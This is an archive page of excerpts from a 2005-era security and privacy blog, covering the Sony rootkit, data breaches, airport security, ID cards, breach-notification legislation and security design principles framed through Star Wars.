An Australian Senator has created a bit of a kerfuffle by saying what everyone has thought in private. Bruce Schneier comments: During her Adelaide speech, Senator Vanstone implied the use of plastic cutlery on planes to thwart terrorism was foolhardy. Implied? I’ll say it outright. It’s stupid. For all its faults, I’m always pleased when […]

Book: Who Becomes a Terrorist and Why

I found “Who Becomes a Terrorist and Why” in a used bookstore for $2.99, and it was worth every depressing penny and more. The book is a US government funded study from 1999. It’s not clear if this work would be possible today or not. Much of the body of the book is an […]

Aspirin and the Regulation of Medicine

As we discuss the effects of various laws designed to protect us from various and sundry, we often lose track of the real, tangible benefits of liberty that we’re giving up. They’re sometimes hard to see, in the same way the Internet was hard to see in the early 90s. It was here, but most […]

Deborah Davis and the Denver "Public" Transit System

On the 9th of December 2005, a Denver woman is scheduled to be arraigned in U.S. District Court. Her crime: refusing to show ID on a public bus. At stake is nothing less than the right of Americans to travel freely in their own country. The woman who is fighting the good fight is named […]

A great idea whose time has come

Ben Edelman explains how Sony can use a messaging mechanism already built into the XCP system to inform people who are not yet aware of the “Sony rootkit” they’ve unwittingly installed, and what they can do about it. This is so obviously the right thing to do that I can almost guarantee Sony will not […]

Book: Secure Architectures with OpenBSD

Jose Nazario gave me a copy of Secure Architectures with OpenBSD this summer. I’m way behind with book reviews, and I wanted to start with this one. I’m a fan of the OpenBSD project. Not only for their efforts around security, but also because they put a great deal of effort into the documentation. I’ve […]

More on "Freedom To Tinker, Freedom to Learn"

In “Freedom To Tinker, Freedom to Learn,” I made some assumptions about the user interface for the $100 laptop. In “Alan Kay at WSIS,” Ethan Zuckerman explains that Alan Kay will be doing much of the user interface design work: Kay began by explaining that most people aren’t using computers to do the most important […]

Google buys Riya, Steamrollers Your Pictures' Anonymity

Riya is a Redwood City startup that makes facial recognition software. Rumor from Om Malik says Google is buying them. I believe that this purchase has some of the farthest reaching privacy implications we’ve yet seen from Google. Anonymity, in its most literal meaning of “without a name,” is the current state of many photographs […]

Boeing, 161,000 SSNs, Stolen laptop

A laptop computer containing names, social security numbers and other sensitive information of 161,000 current and former employees of Boeing Co. was stolen recently, the U.S. aerospace manufacturer said Friday. From “Boeing says laptop with employee info stolen.” A bit more in the Seattle Post-Intelligencer.

Indiana University, 5300 students, malware

According to an Associated Press article appearing in the Indianapolis Star, Personal information about nearly 5,300 Indiana University students might have been accessed by a computer hacker, school officials said. Technicians discovered during a routine scan that three malicious software programs had been installed on a Kelley School of Business instructor’s computer in mid-August, said […]

Star Wars and the Principle of Least Privilege

In this week’s Friday Star Wars Security Blogging, I’m continuing with the design principles from Saltzer and Schroeder’s classic paper. (More on that in this post.) This week, we look at the principle of least privilege: Least privilege: Every program and every user of the system should operate using the least set of privileges necessary […]

ex-MI5 Head: ID Cards are a Bogus National Security Measure

Dame Stella Rimington has said most documents could be forged and this would render ID cards “useless”. “But I don’t think that anybody in the intelligence services, particularly in my former service, would be pressing for ID cards. From the BBC, “Ex-MI5 chief sparks ID card row.” Normally, a “row” requires two sides, with arguments. […]

Panexa

How did Sivacracy manage to rope in the sponsorship dollars? I really need to monetize some sticky eyeballs here. Meanwhile, click the image for more on Panexa.

The Importance of Due Process to Gary Gordon Smith, Abu Bakker and Adel ?

The United States is holding captive at Guantanamo Bay at least two men it knows are innocent of any wrongdoing. These men were cleared by the military courts, almost two years ago, and they are still in captivity. It makes me too angry to write about, so go read Requiem: In the comments to an […]

Sony's Rootkit and the DMCA

Bruce Schneier has a good article [on his blog and] in Wired this morning, “Real Story of the Rogue Rootkit.” One aspect of the whole Sony story that’s not getting a lot of play is why we don’t see more of these things. Is Sony unique in their callous disregard of their customers, or are […]

Industry to Customers: "You're Reckless and Apathetic"

It’s a long standing “joke” that only drug dealers and the computer industry call their customers “users.” But at least drug dealers pretend that your behavior is ok. Not so the Universities educating our next generation of programmers, such as Carnegie Mellon. Their student news source, the Tartan, reports in “Study shows students cause computer […]

Delicious, Feed Me!

Del.icio.us is a ‘social bookmark manager.’ It’s a way to bookmark things, and let you see what I’ve bookmarked, and perhaps commented on. I’m using it more like a “clip blog,” with short commentary on many of the things dropped there. If you read it via the RSS feed, you get my commentary. But […]

Torture and the "Ticking Bomb" Argument

Alex Tabarrok has some interesting arguments as to why torture should be made illegal in “Torture, terrorism, and incentives.” I’d like to extend his argument: President Bush, Dick Cheney and others who support the use of torture by the United States and its agents usually rely on the ticking time bomb argument. Sometimes torture is […]

What I Want From A Log Analyzer

I’m becoming less and less satisfied with AWStats as a log analyzer. There are some things that it does reasonably well. But I’d really like a lot more. I’d like to be able to see how things have changed day to day (for example, how many new unique visitors did I get today?) I’d like […]

Choicepoint's Custom Products

I appreciate all the notes you’ve been sending me telling me about “FBI, Pentagon pay for access to trove of public records.” I’d love to have something insightful to add to this, but I don’t. Ryan Singel has a bit more: The article, which relies on heavily redacted documents acquired through an open government request, […]

Epic Problems With Phone Privacy

In the cover story of next week’s Maclean’s magazine, Jonathon Gatehouse reports that he successfully obtained the phone records of Canadian Privacy Commissioner Jennifer Stoddart: …Her eyes widen as she recognizes what has just been dropped on the conference table in her downtown Ottawa office — detailed lists of the phone calls made from her […]

Under The Weather

I’m feeling under the weather today, and so I’m sitting on the morning posts until I have a chance to re-read them. Expect posting to be heavy today, because I can’t do much real work, and have to entertain myself somehow. I’m hopeful that you’ll either be entertained as well, or forgive me for what […]

Unintended Consequences of Blackhat '05

(by arthur) I’m back from travels, so it’s time to post some more…. As Adam just posted, Jeff Moss sold Blackhat to CMP Media. Presumably, this sale is partially (largely?) a result of the various lawsuits that Blackhat was dealing with as fallout of “Cisco-gate”. Fortunately, these were recently settled in an equitable fashion, but […]

BlackHat Pwned!

MANHASSET, N.Y., Nov. 15 /PRNewswire/ — CMP Media, a marketing solutions company serving the technology, healthcare and entertainment markets, announced today that it has acquired Black Hat Inc., a producer of information security conferences and training that includes Black Hat Briefings and Conferences. Jeff Moss, founder and owner, will continue to run Black Hat and […]

568,200 DNS servers Know Sony

Dan Kaminsky has done some digging into the Sony rootkit: It now appears that at least 568,200 nameservers have witnessed DNS queries related to the rootkit. How many hosts does this correspond to? Only Sony (and First4Internet) knows…unsurprisingly, they are not particularly communicative. But at that scale, it doesn’t take much to make this a […]

Freedom To Tinker, Freedom to Learn

In “The $100 Laptop Moves Closer to Reality,” the Wall St Journal discusses a project to provide very inexpensive laptops to millions of poor children around the world. I think it’s a great idea, and wish them the best of luck. Delivering internet connectivity to millions of poor children will be a world-altering project. One […]

"To none will we sell, to none deny or delay, right or justice."

The United States Senate voted today to deny habeas corpus to prisoners at Guantanamo. The United States Supreme Court had recently held that United States courts have jurisdiction to consider challenges to the legality of the detention of foreign nationals captured abroad in connection with hostilities and incarcerated at Guantanamo Bay. The vote today would […]

Simplify!

The sad passing of Peter Drucker, and Paul Kedrosky’s post on it brought something into sharp focus for me. It’s the value of working hard to make yourself understood, as opposed to making your audience work hard to understand you. One of my goals in blogging here is to learn to be understandable to the […]

NISCC Does It Their Way: Poorly

A post by Paul Wouters to the DailyDave list drew attention to “Vendor response of the Openswan project” to “NISCC Vulnerability Advisory 273756/NISCC/ISAKMP.” I feel like it’s 1997 again. The Oulu University Secure Programming Group (OUSPG) discovered a number of flaws with the ISAKMP/IKE portions of the IPSec protocols. OUSPG built a tool, and either […]

New, Useful, and Non-Obvious

My friend Sharon, who is an excellent patent attorney, showed me this, her favorite U.S. patent. You should hire her![1] She’s really good, even if she does a lot of work for an empire of questionable morals, but is not yet so evil as to have written anything like US Patent 4,646,382, “Lottery Ticket Scraper:” […]

Gordon Johnston vs. The NFL Who Cried Wolf

Gordon Johnston didn’t want to be frisked. So as the 60-year-old high school teacher approached the gates of Raymond James Stadium here for a Buccaneers football game last month, he lifted the team jersey he was wearing to show it wasn’t necessary. He was concealing no bombs. It didn’t work. So reports the Washington Post […]

Kill Bill's Browser (and Comments)

Some folks have put up a site, “Kill Bill’s Browser,” based on Google’s offer to pay up to $1 for each Firefox/Google Toolbar install. It offers up both good and entertaining reasons to switch: 7. It will make Bill Gates soooooooooo mad. Seriously– super, super mad. And even more than Bill, let’s think about Steve […]

MIT Researchers on Radio Shielding

Abstract: Among a fringe community of paranoids, aluminum helmets serve as the protective measure of choice against invasive radio signals. We investigate the efficacy of three aluminum helmet designs on a sample group of four individuals. Using a $250,000 network analyser, we find that although on average all helmets attenuate invasive radio frequencies in either […]

Friday Star Wars and the Principle of Complete Mediation

This week in Friday Star Wars Security Blogging, we examine the principle of Complete Mediation: Complete mediation: Every access to every object must be checked for authority. This principle, when systematically applied, is the primary underpinning of the protection system. It forces a system-wide view of access control, which in addition to normal operation includes […]

Macs and Sony's Rootkit

[Update: Welcome Wired readers! If you enjoyed Bruce Schneier’s article on who’s responsible for security flaws, please explore a little. The economics of security and privacy issues are an ongoing theme.] It wasn’t a plan that I was going to slag Apple this week. Really, I’m fond of my Mac, I’m just tired of claims […]

R-E-S-P-E-C-T! Find Out What It Means to Tom Peters

Tom Peters has a magnificent article, “Simple.” Go read the article. It’s really beautiful. Don’t mistake simple for easy, but this is an easy read about the need for respect in winning the cooperation of whomever you’re dealing with: “We were friendly and respectful whenever we met a Bedouin or farmer, often sharing tea with […]

This is convergence, too :^)

The Amazon Mechanical Turk. Basically, you have your code do a remote procedure call, where the bulk of the work on the remote side is performed by a human being.

Preserving the Internet Channel Against Phishing, Part 2

At this point I was pretty sure this was a social engineering attack, so I started to quiz her about why she needed the information. She said it was for a “security check”. I told her I was uncomfortable giving out information like this to a cold caller over the phone and she said it […]

Kudos to Microsoft, Brickbats to Apple

MS05-038 and MS05-052 contain a number of defense-in-depth changes to the overall functionality of Internet Explorer. These changes were done mostly for security reasons, removing potentially unsafe functionality and making changes to how Internet Explorer handles ActiveX controls. As a result of these changes that we made for security sake, for a limited amount of […]

This is convergence

A gamer who spent £13,700 on an island that only exists in a computer game has recouped his investment, according to the game developers. The 23-year-old gamer known as Deathifier made the money back in under a year. The virtual Treasure Island he bought existed within the online role-playing game Project Entropia. He made money […]

Digital Pearl Harbor

[U]se of commercial products with unbreakable cryptography could seriously undermine the ability of law enforcement to perform critical missions such as protecting against threats posed by terrorists, organized crime, and foreign intelligence agents This from a rather lightweight report prepared by the Congressional Research Service. I may have read it with a jaundiced eye, but […]

Canadian Air Transport Security Authority to Hire Angelina Jolie

In the midst of a CBC story about how a consultant went through “door after door” in Toronto’s Pearson airport (“Investigation highlights security concerns at Canadian airports”), we’re treated to these lovely tidbits: Mark Duncan, chief operating officer for the Canadian Air Transport Security Authority, the agency tasked with providing security at Canadian airports, says […]

The Approaching Apple OSX86 Security Nightmare

In the midst of an excellent long article on how the Wine Windows emulation layer will interact with OSX86 (“I invite you to wine”), Wil Shipley writes: When you can run Windows apps on Mac OS X, you’ll still be protected by Mac OS X. Viruses are going to be dead. D-E-D. Ok, yes, there […]

Transunion, 3,623 SSNs, Stolen Computer

Social Security numbers and other information about more than 3,000 consumers were stolen recently from TransUnion LLC, one of three U.S. companies that maintain credit histories on individuals, in the latest of many security breaches that have focused congressional attention on identity theft and fraud. The data were housed in a desktop computer that was […]

How Much Goodwill is 17,000 Letters Worth?

The Seattle Post Intelligencer reports that “ChoicePoint warns consumers about fraud:” ChoicePoint Inc., the company that disclosed earlier this year that thieves had accessed its massive database of consumer information, said Tuesday in a regulatory filing it has sent out another 17,000 notices to people telling them they may be victims of fraud. The story […]

University of Tennessee, 1,900 SSNs, Bad Policies

The University of Tennessee notified about 1,900 students and employees yesterday that their names and Social Security numbers inadvertently were posted on the Internet. … A University of Tennessee student made the discovery about two weeks ago when she searched the Internet for her name and found it listed with her Social Security number on […]

Are You Selling This Computer to Me or the RIAA?

(I wrote this a few weeks back, and forgot to post it. It’s even more fun with the brouhaha about Sony/BMG screwing with your computer if you buy their “music.”) In conversation with Lucky Green, he commented that “You won’t be able to buy a laptop w/o a TPM in a few years.” This doesn’t […]

Macromedia Flash Critical Update

There’s apparently a critical flaw in Macromedia Flash 7. (You know, the software that plays annoying ads in your browser?) This affects at least PCs and Macs. Macromedia’s advisory is here. eEye has an advisory which makes it sound like a PC-only issue. Sec-Consult has published POC code. It’s unclear to me why, 130 days […]

Freedom to Develop

Two related posts from last week that I’d like to tie together. Jeff Veen writes about the lack of either Mac software or standards compliance in Polar Heart Rate Monitors in “Polar Heart Rate Monitors: Gimme my data,” and Bob Frankston writes about how the telcos use the regulators to stifle competition and innovation in […]

Choicepoint Roundup

Well, I’ve tried going cold turkey, but wasn’t getting positive reinforcement, so I stopped. Let’s start from the positive, shall we? Chris Hoofnagle of EPIC is quoted in a positive light in “ChoicePoint says it’s securing public’s personal data better” in the Atlanta Journal Constitution. Now that that’s out of the way. Science Daily tells […]

Iraq-al Qaeda Link Questioned

The New York Times has a story, “Report Warned Bush Team About Intelligence Doubts:” “It is possible he does not know any further details; it is more likely this individual is intentionally misleading the debriefers,” the February 2002 report said. “Ibn al-Shaykh has been undergoing debriefs for several weeks and may be describing scenarios to […]

The Tories Just Don't Understand Art

Audiences at the Government-funded Chapter arts centre in Canton, Cardiff, see Miss Takahashi arrive on stage in high heels and a smart black business suit. For the next three hours, they watch her drink bottle after bottle, periodically lurching towards her beam and seeing how much of it she can negotiate without falling off. … […]

Froomkin and Vladeck on Roberts

Ann Bartow describes it as “completely awesome pedantic weeniedom, and I mean that in the best possible way.” I would have just tossed this in my del.icio.us feed, but wanted to boost Michael Froomkin’s page rank for pedantic weeniedom. I hope he doesn’t mind. (Via Volokh)

Strategy In Iraq: Stay the Course vs Partial Disruption

Global Guerrillas has a fascinating post, “PARTIAL vs. COMPLETE SYSTEM DISRUPTION.” The thesis is that Iraqi guerrillas and terrorists have the ability to complete the collapse of Iraq into anarchy, but have chosen not to, for reasons that he lays out. As van Creveld predicted in “The Transformation of War,” we lack a good way […]

Data Destroying Anonymity

New Scientist reports “Anonymous sperm donor traced on internet:” LATE last year, a 15-year-old boy rubbed a swab along the inside of his cheek, popped it into a vial and sent it off to an online genealogy DNA-testing service. But unlike most people who contact the service, he was not interested in sketching the far […]

Miss McDonald's Halloween

Miss McDonald has an art project at Livejournal: Or perhaps Miss McDonald is an art project. Hard to say with any certainty. But why would you want to?

15% of Oregonians at Risk from DMV

Police have a warning for anyone who did business with the Oregon Department of Motor Vehicles in 1999 or 2000. They say as many as a half-million stolen DMV records were found on a laptop during a methamphetamine bust Wednesday night at a southeast Portland apartment complex. They allegedly discovered evidence of meth distribution and […]

Business Process Hacking

Business process hacking is the act of using weaknesses in the way an application is exposed to garner information or break in. Recent examples include the ChoicePoint and Lexis-Nexis attacks. Here is a new one. A couple of young traders at an Estonian bank got a Businesswire account and proceeded to dig around until they […]

We want it all, and we want it now

Bob Sullivan provided excellent “mainstream media” ChoicePoint coverage, and is doing some good blogging about breach legislation. From the blog post cited above, it’s clear that Sullivan considers the Act in question to be nigh-on to a total cave-in to industry. That things would have taken this turn is not surprising, but is nonetheless somewhat […]

Oh what a tangled web we weave…

Sony’s DRM rootkit has been harnessed by folks selling a program which hides game cheats from detective measures shipped with WoW and affectionately known as The Warden. Somehow, I am reminded of a Simpsons quote [.mp3]

Friday Star Wars: Principle of Fail-safe Defaults

In this week’s Friday Star Wars Security Blogging, I’m continuing with the design principles from Saltzer and Schroeder’s classic paper. (More on that in this post.) This week, we look at the principle of fail-safe defaults: Fail-safe defaults: Base access decisions on permission rather than exclusion. This principle, suggested by E. Glaser in 1965 means […]

10m (or more) Stolen Passports

Arab News picks up an Agence France-Presse story, “Terrorist Access to Stolen Passports Alarms Interpol:” (Via Flogging the Simian’s Nov 4 PDB.) NEW YORK, 4 November 2005 — With 10 to 15 million stolen passports in use around the world at the present time, the global struggle against terrorism is seriously hampered, Interpol Secretary-General […]

Hashes: The High Cost of Deployment

Thanks for the great intro, Adam! Steven Bellovin and Eric Rescorla recently released a paper, “Deploying a New Hash Algorithm.” This is a great analysis of both the operational and protocol issues with changing which hash algorithms get used by various security protocols. For instance, S/MIME has no real mechanism for negotiating which hashes (and this […]

Introducing Arthur

I’d like to introduce Arthur, our newest guest. I was going to say Arthur is not his real name, but that would be a lie. It is his real name for purposes of this blog. It might, however, not be what his wife calls him. (“Sweetie.”) Arthur is, however, the chief information security officer for […]

Joseph Ansanelli, Brad Smith on Privacy Law

The [Stearns] bill would also require companies to notify not just consumers of a breach, but also the F.T.C., which would then be permitted to audit the company’s security program. “But it needs better enforcement language,” said Joseph Ansanelli, the chief executive and co-founder of Vontu, an information security company in California, who has frequently […]

The CIA's "Prisons"

Yesterday’s Washington Post had a long, sickening article on “CIA Holds Terror Suspects in Secret Prisons:” The hidden global internment network is a central element in the CIA’s unconventional war on terrorism. It depends on the cooperation of foreign intelligence services, and on keeping even basic information about the system secret from the public, foreign […]

The Cost of Following The Money

[Update: There’s a fairly long clarification in the middle of the post, which expands on a sentence that was too brief to be understandable.] One of the fond dreams of the counter-terror community is to be able to take Deep Throat’s advice, and follow the money. In “New Anti-Money Laundering Regulations and Compliance Solutions Announced,” […]

Episode III Released on DVD

Q. Do friends and family ever ask you [Frank Oz] to do Yoda on their phone answering machines? A. Yep. And I always say no. He’s not a party trick. He’s not a trained monkey. And I’m not a man like Mel Blanc, who’s a brilliant man of voices. I’m a man of characters; I […]

Relentless Navel Gazing, Part 2

Upgraded the blog software, added a fair number of little tidbits, including lots more archive indexes, better per-post options, and will be tweaking lots of little stuff over the next few days. Also, added automated “posted by” bits, and am going through older posts and cleaning out those bits. Which means that RSS will get […]

 

Speaking Of Worms

Following up on Chris’s worm post, Red Database Security has an advisory on an Oracle worm. On 31-october 2005 an anonymous poster (oracleworm@hushmail.com) released a proof-of-concept PL/SQL source code of an Oracle worm on the full disclosure mailing list. The worm is using the utl_tcp package to find other Oracle databases in the same subnet […]

 

Properties of National ID Systems

In “learning from others,” Jerry Fishenden writes at length about National ID systems and their impact on society. His post includes a list of properties an ID system should have, (originally from Niels Bjergstrom). His theme that these systems don’t only have ‘features,’ but properties is an important one. I’d like to suggest two additions: […]

 
 

Sony, Respecting Their Customer

Over at Sysinternals, Mark posts “Sony, Rootkits and Digital Rights Management Gone Too Far.” [Update: If that doesn’t work, try Sysinternals Blog; when I checked, it was the first post.] If you’re at all technical, read it closely. If you’re not, you should at least skim it. The story is that Mark (who knows more […]

 

American Express and Privacy

There’s a fascinating story at imedia connection, “Why Consumers Trust American Express:” How has American Express retained its position? Kimberly Forde, an American Express spokesperson, told me that “American Express is very pleased to be recognized by consumers for its ongoing and strong commitment to privacy.” Moreover, she felt that American Express had done a […]

 

Imperial Ambition, Poor Execution

In “The endgame on Iraq began a long time ago,” Thomas Barnett writes some shocking things: This is Musab al-Zarqawi’s worst nightmare: the Americans safe behind their compound walls and everyday he’s doing battle against Iraqis, or-more to the point-against Shiites increasingly backed by Iran, no friend to the global Salafi jihadist movement, being as […]

 

First Hand Report about New TSA Indignities

In “GE Puffer Stinks of Dr. Strangelove,” Kim Cameron writes about his experiences with the new explosive detection machines: People, I really hated the GE product. It is tiny, and closes around you. I felt seriously claustrophobic. Then it shot bursts of air at me so hard it actually hurt. I had been told there […]

 

Fall Back

It’s that time of year again, when Congress decrees that you shift your clock back an hour to save minuscule amounts of energy. The fine folks of Arizona and Indiana have noticed that Congress doesn’t really have the power to regulate time, and don’t like playing along. But if you think about it, time is […]

 
 

Porsches make you healthy

Well, I don’t know that for sure. But I am pretty sure that Porsche owners overall are healthier than those who don’t own Porsches. Maybe you have to control for age. Similarly, it seems that being a customer of certain companies apparently somehow causes less nastiness to befall one’s computing infrastructure. Jaquith handily, yet unwittingly, […]

 

Quick pointer to virtual worminess

If Nick Weaver and Jose Nazario are writing about it, it’s probably way over my head, or interesting, or both. I am happy to say this is in the second category.

 

Ahmadinejad and Wiping Israel Off The Map

Posted by Adam

It seems that most everything that one could say about the President of Iran calling for Israel to be wiped off the map has been said. Good articles include Daniel Drezner’s “How crazy is Mahmoud Ahmadi-Nejad?” (about the strategy behind the statement), Hossein (Hoder) Derakhshan’s “The fundamentalist minority” (about how Iranians feel […]

 

The Importance of Attitude

Tom Peters has a blog, and in “The Days of Our Lives,” writes about the importance of being present for your customers, not for yourself. I really like his blog. It has a good mix of hubris and humility: This may be day 45 and mile 76,000 for me, but for the Client it is […]

 

Star Wars: Economy Of Mechanism

Before I start on the Star Wars part of today’s Friday Star Wars Security blogging, I need to explain who Saltzer and Schroeder are, and why I keep referring to them. Back when I was a baby in diapers, Jerome Saltzer and Michael Schroeder wrote a paper “The Protection of Information in Computer Systems.” That […]

 

Check images increase forgery and ID theft risks?

The October 26 on-line edition of American Banker (gotta pay to see it, so no link from me) discusses new technologies as possible enablers of check forging, in an article by Daniel Wolfe, “The Tech Scene: Check Images A New Frontier For Forgery?” The overall point is that since banks store check images and provide […]

 

White Sox futures market

For the last couple of weeks, peddlers have set up shop just outside Chicago’s Union Station to sell White Sox paraphernalia. Once the Sox were in the Series, I noticed an interesting phenomenon. Hats were selling for $10.00 after game two of the series. After game three, they were down to $5.00. After game 4 […]

 

Dog bites man really is boring

Red Herring reports on a claim by Cybertrust that recovering from Zotob cost the average infected company $97,000. Sounds moderately interesting, until you learn that the industry hardest hit, healthcare, had 74% of its respondents totally unaffected. For financial firms, 93% were totally unaffected. Overall, nearly 90% of firms had no impact. Nada. Alternative headlines […]

 

Lowering Ourselves

It occurs to me that when a senior US government lawyer says: “foreign citizens passing through American airports have almost no rights. At most, Mary Mason told a hearing in Brooklyn, N.Y., passengers would have the right not to be subjected to ‘gross physical abuse.’” that they are in direct contradiction to the US Constitution […]

 

Flogging The Simian Is Back

In “A Life, Observed,” I mentioned that I’d been enjoying “Flogging The Simian,” and that she’d left due to privacy issues. Well, she’s back, and so are her “PDBs,” her summaries of what’s interesting: “I read approximately 50 newspapers every morning and report what I find there, with an emphasis on foreign or international events.” […]

 

Trick-Or-Treaters To Be Subject To Random Bag Searches

America’s Finest News Source reports, “Trick-Or-Treaters To Be Subject To Random Bag Searches:” “Individuals concealing their identities through clever disguise, and under cover of night, may attempt to use the unspecified threat of ‘tricks’ to extort ‘treats’ from unsuspecting victims,” Chertoff said. “Such scare tactics may have been tolerated in the past, but they will […]

 

Code/Data Separation

As I mentioned in my “Blue Hat Report,” I want to expand on one of my answers I gave to a question there. My answer involved better separation of code and data. I’ve since found, in talking to a variety of folks, that the concept is not so obvious as it seems to me. The […]

 

The President Endorses This Blog

You might have thought that the White House had enough on its plate late last month, what with its search for a new Supreme Court nominee, the continuing war in Iraq and the C.I.A. leak investigation. But it found time to add another item to its agenda – stopping The Onion, the satirical newspaper, from […]

 

Delicious Offload

I’ve set up a Delicious feed for stuff that I want to point to, but don’t have either anything to add, or time to add it. I feel sort of bad doing this; I’d like to discuss John Gilmore on the New York Times, but all I have to say is bravo!

 

Counting In Computer Security

Last week in “Notes from the Security Road,” Mike Nash wrote: My favorite moment on the trip — which actually resulted in my circumnavigating the entire globe in just a week — was when we illustrated the difference in the number of vulnerabilities in Windows Server 2003 compared to its competitive product, Red Hat Enterprise […]

 

Rosa Parks

Rosa Parks passed away this evening. She was 92.

 

Business lobbies engage in rent-seeking. Masses not moved. Film at 11.

Various data protection bills to be consolidated? [P]ressure to act isn’t coming from the public clamoring for protection of their private information, it is coming from the business community that fears 50 different state laws. In many ways this improves the chances for a new federal law, because while the onslaught of data breach stories […]

 

How Not To Train Users

To provide the fastest access to our home page for all of our millions of customers and other visitors, we have made signing in to Online Banking secure without making the entire page secure. Again, please be assured that your ID and passcode are secure and that only Bank of America has access to them. […]

 

Flock's Progress

Posted by Adam

Lots and lots of people are commenting on the first public release of flock. After I met Bart Decrem, he was nice enough to let me into the alpha, and so I’d like to offer a slightly different perspective, about what’s changed, and the rate of change. I think that examining what’s […]

 

Sessions Bill/Breach Monday

In ‘honor’ of the Sessions bill (see “The hand is quicker than the eye” and “Adding Silent Insult to Injury (Senator Sessions’ ‘privacy’ act)“), we offer up stories about three breaches. Under Sessions’ bad law, the state of Georgia would not be coming clean with its residents, nor would the California school system. I think […]

 

5.2% of Georgia residents to get Notice of Stolen Personal Data

State officials on Friday began notifying 465,000 Georgians that they might be at risk of identity theft because of a government security breach detected in April. Joyce Goldberg, spokeswoman for the Georgia Technology Authority, emphasized that officials had no evidence that any personal data had been used for fraudulent purposes. But she said officials are […]

 

California Schools, "tens of thousands" of Student Records, Default Passwords

The personal information of tens of thousands of California children — including their names, state achievement test scores, identification numbers and status in gifted or special-needs programs — is open to public view through a security loophole in dozens of school districts statewide that use a popular education software system. … The problem occurs when […]

 

Montclair State University, 9,100 SSNs, Exposed Files

Due to what Montclair State University officials are calling an “inadvertent error,” the social security numbers of 9,100 Montclair State University students were made available online for nearly five months, putting each student at risk for identity theft and credit fraud. Etc, etc, files found by a student ego-surfing on Google. Read “Negligence At MSU […]

 

Archimedes' Death Ray, Take 2

Earlier this month, I posted “Archimedes’ Death Ray,” about the MIT team trying to replicate Archimedes’ legendary defense of Syracuse, setting fire to ships with polished mirrors. Now Mythbusters has brought MIT Professor David Wallace to San Francisco to: …attempt to set fire to an 80-year-old fishing boat with a contraption made of 300 square […]

 

People Hate Being Laughed At

Omid Sheikhan has been sentenced by the Iranian court to one year in prison and 124 lashes. Omid was first arrested last year, confined for two months, including one in solitary confinement, and tortured, due to his blog which featured satire on the Iranian situation. When he was brought to court on October 8 he […]

 

Adding Silent Insult to Injury (Senator Sessions' "privacy" act)

I just skimmed the Sessions’ bill which Chris linked to. It has a great provision for allowing the fox to not only guard the henhouse, but also to control the alarm system: 3(b)(1)(A) IN GENERAL- If an agency or person that owns or licenses computerized data containing sensitive personal information, determines, after discovery and a […]

 

The hand is quicker than the eye

Arlen Specter and Pat Leahy have proposed the “Personal Data Privacy and Security Act of 2005“. This is a comprehensive proposal, and is opposed big-time by various industry lobbies. As reported in the October 21, 2005 American Banker, this bill has hit a snag, and is languishing in Committee. Meanwhile, another bill, courtesy of Jeff […]

 

Critical Map of Alaska Disappears

‘There is a Party slogan dealing with the control of the past,’ [O’Brien] said. ‘Repeat it, if you please.’ ‘”Who controls the past controls the future: who controls the present controls the past,”‘ repeated Winston obediently. ‘”Who controls the present controls the past,”‘ said O’Brien, nodding his head with slow approval. ‘Is it your opinion, […]

 

Snotty Worm Coming?

Posted by Adam

Richard Bejtlich predicts that the Snort network monitoring tool will be hit with a worm shortly in “The Coming Snort Worm.” He has some good qualitative analysis, and Tom Ptacek disagrees with him in “Opposition Research.” I find it fascinating that we know so little that two smart guys like Tom and […]

 

Don't Have a Cow!

Or, perhaps, in this instance, having a cow would be a perfectly fine response, as it is revealed that the average European cow gets a subsidy of $2.62 a day. About 3,000,000,000 people live on less than that. Doubtless, if cows could call their representatives and vote, the subsidy would be higher. (Research by Oxfam, […]

 

Horton Hears a Heart

Brilliant retelling of the Tell-Tale Heart, by Poe, in the style of Dr. Seuss. True, I’ve been shaken – and true, I’ve been bad. But how can you say that this elephant’s mad? This Loopidy sickness has sharpened my brain! My ears are quite large, and I hear things quite plain. So before you pass […]

 

Bubblicious

As we now know courtesy of the Philippines’ National Capital Regional Police Office, a typical terrorist is “a man aged 17 to 35, wearing a ball cap, carrying a backpack, clutching a cellular phone and acting uneasily” [manilatimes.net]. This critical piece of intelligence, I am sorry to report, seems to have taken a step closer […]

 

Map of London

OpenStreetMap is a project aimed squarely at providing free geographic data such as street maps to anyone who wants them. This is because most maps you might think of as free actually have legal or technical restrictions on their use, holding back people from all walks of life who would like to use a map […]

 

Pop!Tech ('Pointer' post by Adam)

I don’t know how Ethan Zuckerman is finding time to enjoy the conference, but his series of posts from Pop!Tech make me jealous that I’m missing it.

 

"The Force Is Strong In My Family"

In Friday Star Wars Security blogging, I was planning to start on Saltzer and Schroeder this week. But I’m going to detour a bit into genetic privacy (and Star Wars, of course). I’m inspired in part by an interview over at GeneForum with bioethicist Insoo Hyun. Hyun is studying cloning with the South Korean team […]

 

Following up "Liability for Bugs"

Chris just wrote a long article on “Liability for bugs is part of the solution.” It starts “Recently, Howard Schmidt suggested that coders be held personally liable for damage caused by bugs in code they write.” Chris talks about market failures, but I’d like to take a different direction and talk about organizational failures. Security […]

 

Liability for bugs is part of the solution

Recently, Howard Schmidt suggested that coders be held personally liable for damage caused by bugs in code they write. The boldness of this suggestion is exceeded only by its foolhardiness, but its motivation touches an important truth — a lot of code stinks, and people are damaged by it. The reason good programs (which means those […]

 

The prescience of the Beeb

Via Alec Muffett’s dropsafe, I learned of a British SF television program which eerily predicted a future Britain in which “a sinister governmental department has abolished individual rights and introduced ID cards for all citizens, rationing and sophisticated electronic surveillance.” I would have preferred to have gotten a transdimensional police box.

 

Your Printer, Tool of the Man

The EFF has done some great work on how high resolution color printers are embedding tracers in every document they print. It’s at “DocuColor Tracking Dot Decoding Guide.” I’d call them high quality printers, but how could I? They intentionally distort every document they print on the off-chance it contains evidence of thoughtcrime. The work […]

 

How To Notify Customers After a Breach

I referenced Larry Ponemon’s “After a privacy breach, how should you break the news?” months ago. Now there’s more data, in a survey sponsored by the law firm of White and Case. They have a press release, and you can download the full survey. As Chris pointed out, knowledge is good. According to the survey, […]

 

Interesting Tidbits (Adam)

John Gruber has an interesting article on the economics of being a one-man software shop, “The Life.” He uses the case of Brent Simmons and NetNewsWire to shed light on why the life of a small software development shop is so hard. Jeff Veen of Adaptive Path has announced “MeasureMap,” a new blog-focused log analysis […]

 

Here's to you, New York…

From New York’s Information Security Breach and Notification Act: 7. (A) IN THE EVENT THAT ANY NEW YORK RESIDENTS ARE TO BE NOTIFIED AT ONE TIME, THE PERSON OR BUSINESS SHALL NOTIFY THE STATE ATTORNEY GENERAL, THE CONSUMER PROTECTION BOARD, AND THE STATE OFFICE OF CYBER SECURITY AND CRITICAL INFRASTRUCTURE COORDINATION AS TO […]

 

MS Security 360 Webcast archive

